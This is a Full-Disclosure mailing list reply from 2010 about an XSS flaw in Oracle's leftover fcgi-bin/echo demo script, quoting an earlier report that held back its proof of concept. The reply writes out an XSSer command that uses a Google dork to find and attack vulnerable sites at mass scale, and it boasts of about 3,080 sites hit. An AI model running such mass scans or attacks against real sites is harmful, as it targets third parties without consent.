mailing list archives
Re: XSS in Oracle default fcgi-bin/echo
From: psy <root () lordepsylon net>
Date: Fri, 08 Oct 2010 16:16:47 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Maybe with a FD poc they decide to fix it.
Detecting, exploiting and reporting "fcgi-bin/echo" Oracle vulnerability
with XSSer (http://xsser.sf.net)
./XSSer -d "'inurl:fcgi-bin/echo'" --De "google" --proxy
"http://127.0.0.1:8118" -s --publish
Results of the botnet attack in real time:
Reported: apróx 3.080 websites vulnerables.
On 10/08/2010 12:18 AM, paul.szabo () sydney edu au wrote:
Many Oracle web server installations have a fcgi-bin/echo script
left over from default demo (google for inurl:fcgi-bin/echo). That
script seems vulnerable to XSS. (PoC exploit and explanation of
impact withheld now.)
I asked security () oracle com and they said that "... this issue has
been resolved in an earlier Critical Patch Update."
They said the same to me one year ago.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
-----END PGP SIGNATURE-----
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/
Re: XSS in Oracle default fcgi-bin/echo sumit kumar soni (Oct 14)